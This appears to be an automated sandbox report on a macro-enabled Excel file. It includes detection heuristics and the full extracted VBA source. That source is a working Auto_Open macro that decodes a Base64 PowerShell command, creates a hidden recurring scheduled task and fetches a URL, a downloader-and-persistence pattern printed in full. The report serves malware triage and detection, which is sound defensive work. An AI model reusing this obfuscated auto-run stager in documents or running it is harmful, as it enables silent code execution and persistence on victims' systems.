MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1105 Ingress Tool Transfer
The sample contains a VBA macro with an Auto_Open subroutine that decodes a Base64 string and executes it using WScript.Shell. The decoded command is a PowerShell script that downloads content from https://www.example.com and creates a scheduled task for persistence. This indicates the document is a downloader designed to fetch and execute further malicious content.
Heuristics 8
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
cmd = DecodeBase64("cG93ZXJzaGVsbCAtY29tbWFuZCAgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlcnNoZWxsLmV4ZScgLUFyZ3VtZW50ICctTm9Qcm9maWxlIC1XaW5kb3dTdHlsZSBIaWRkZW4gLWNvbW1hbmQgIiYgeyRSZXNwb25zZSA9IEludm9rZS1XZWJSZXF1ZXN0IC1VUkkgaHR0cHM6Ly93d3cuZXhhbXBsZS5jb207ICR3PU5ldy1PYmplY3QgLUNvbU9iamVjdCBXc2NyaXB0LlNoZWxsOyR3LlBvcHVwKFwiVGhlIHByb29mIHRhc2sgd2FzIGV4ZWN1dGVkXCIsMCxcIkRvbmVcIiwweDEpfSInOyAkcmVwZWF0ID0gKE5ldy1UaW1lU3BhbiAtTWludXRlcyA1KTskdHJpZ2dlciA9ICBOZXctU2NoZWR1bGVkVGFz … CreateObject("WScript.Shell").Exec (cmd) -
VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGERVBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.Matched line in script
cmd = DecodeBase64("cG93ZXJzaGVsbCAtY29tbWFuZCAgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlcnNoZWxsLmV4ZScgLUFyZ3VtZW50ICctTm9Qcm9maWxlIC1XaW5kb3dTdHlsZSBIaWRkZW4gLWNvbW1hbmQgIiYgeyRSZXNwb25zZSA9IEludm9rZS1XZWJSZXF1ZXN0IC1VUkkgaHR0cHM6Ly93d3cuZXhhbXBsZS5jb207ICR3PU5ldy1PYmplY3QgLUNvbU9iamVjdCBXc2NyaXB0LlNoZWxsOyR3LlBvcHVwKFwiVGhlIHByb29mIHRhc2sgd2FzIGV4ZWN1dGVkXCIsMCxcIkRvbmVcIiwweDEpfSInOyAkcmVwZWF0ID0gKE5ldy1UaW1lU3BhbiAtTWludXRlcyA1KTskdHJpZ2dlciA9ICBOZXctU2NoZWR1bGVkVGFz … CreateObject("WScript.Shell").Exec (cmd) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
cmd = DecodeBase64("cG93ZXJzaGVsbCAtY29tbWFuZCAgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlcnNoZWxsLmV4ZScgLUFyZ3VtZW50ICctTm9Qcm9maWxlIC1XaW5kb3dTdHlsZSBIaWRkZW4gLWNvbW1hbmQgIiYgeyRSZXNwb25zZSA9IEludm9rZS1XZWJSZXF1ZXN0IC1VUkkgaHR0cHM6Ly93d3cuZXhhbXBsZS5jb207ICR3PU5ldy1PYmplY3QgLUNvbU9iamVjdCBXc2NyaXB0LlNoZWxsOyR3LlBvcHVwKFwiVGhlIHByb29mIHRhc2sgd2FzIGV4ZWN1dGVkXCIsMCxcIkRvbmVcIiwweDEpfSInOyAkcmVwZWF0ID0gKE5ldy1UaW1lU3BhbiAtTWludXRlcyA1KTskdHJpZ2dlciA9ICBOZXctU2NoZWR1bGVkVGFz … CreateObject("WScript.Shell").Exec (cmd) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Attribute VB_Name = "Module1" Sub Auto_Open() cmd = DecodeBase64("cG93ZXJzaGVsbCAtY29tbWFuZCAgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlcnNoZWxsLmV4ZScgLUFyZ3VtZW50ICctTm9Qcm9maWxlIC1XaW5kb3dTdHlsZSBIaWRkZW4gLWNvbW1hbmQgIiYgeyRSZXNwb25zZSA9IEludm9rZS1XZWJSZXF1ZXN0IC1VUkkgaHR0cHM6Ly93d3cuZXhhbXBsZS5jb207ICR3PU5ldy1PYmplY3QgLUNvbU9iamVjdCBXc2NyaXB0LlNoZWxsOyR3LlBvcHVwKFwiVGhlIHByb29mIHRhc2sgd2FzIGV4ZWN1dGVkXCIsMCxcIkRvbmVcIiwweDEpfSInOyAkcmVwZWF0ID0gKE5ldy1UaW1lU3BhbiAtTWludXRlcyA1KTskdHJpZ2dlciA9ICBOZXctU2NoZWR1bGVkVGFz … -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://www.example.com Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2105 bytes |
SHA-256: 381e804461623777b8ab74e8ad13f61cd87178f4f10d958f7df76af608fd5c50 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Auto_Open()
cmd = DecodeBase64("cG93ZXJzaGVsbCAtY29tbWFuZCAgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlcnNoZWxsLmV4ZScgLUFyZ3VtZW50ICctTm9Qcm9maWxlIC1XaW5kb3dTdHlsZSBIaWRkZW4gLWNvbW1hbmQgIiYgeyRSZXNwb25zZSA9IEludm9rZS1XZWJSZXF1ZXN0IC1VUkkgaHR0cHM6Ly93d3cuZXhhbXBsZS5jb207ICR3PU5ldy1PYmplY3QgLUNvbU9iamVjdCBXc2NyaXB0LlNoZWxsOyR3LlBvcHVwKFwiVGhlIHByb29mIHRhc2sgd2FzIGV4ZWN1dGVkXCIsMCxcIkRvbmVcIiwweDEpfSInOyAkcmVwZWF0ID0gKE5ldy1UaW1lU3BhbiAtTWludXRlcyA1KTskdHJpZ2dlciA9ICBOZXctU2NoZWR1bGVkVGFza1RyaWdnZXIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuRGF0ZSAtUmVwZXRpdGlvbkludGVydmFsICRyZXBlYXQgLVJlcGV0aXRpb25EdXJhdGlvbiAoTmV3LVRpbWVTcGFuIC1EYXlzICgzNjUgKiAyMCkpO1JlZ2lzdGVyLVNjaGVkdWxlZFRhc2sgLUFjdGlvbiAkYWN0aW9uIC1UcmlnZ2VyICR0cmlnZ2VyIC1UYXNrTmFtZSBcIkV4cGxvaXRpbmcgZXhhbXBsZSB0YXNrXCIgLURlc2NyaXB0aW9uIFwiVGhpcyB3YXMgY3JlYXRlZCBhcyBhIHByb29mIG9mIGEgc3VjY2Vzc2Z1bCBleHBsb2l0IGluIHRoZSBzeXN0ZW0uIEl0IHdpbGwgY3JlYXRlIGluIHRoZSBkZXNrdG9wIGEgcHJvb2YudHh0IGZpbGUgZXZlcnkgNSBtaW51dGVzXCI=")
CreateObject("WScript.Shell").Exec (cmd)
End Sub
Function DecodeBase64(b64$)
Dim b
With CreateObject("Microsoft.XMLDOM").createElement("b64")
.DataType = "bin.base64": .Text = b64
b = .nodeTypedValue
With CreateObject("ADODB.Stream")
.Open: .Type = 1: .Write b: .Position = 0: .Type = 2: .Charset = "utf-8"
DecodeBase64 = .ReadText
.Close
End With
End With
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 26624 bytes |
SHA-256: e9439c5d6e718bf8ae5bc1f2aa4fb74bdeb954742ca6fca3652191612d5ef891 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.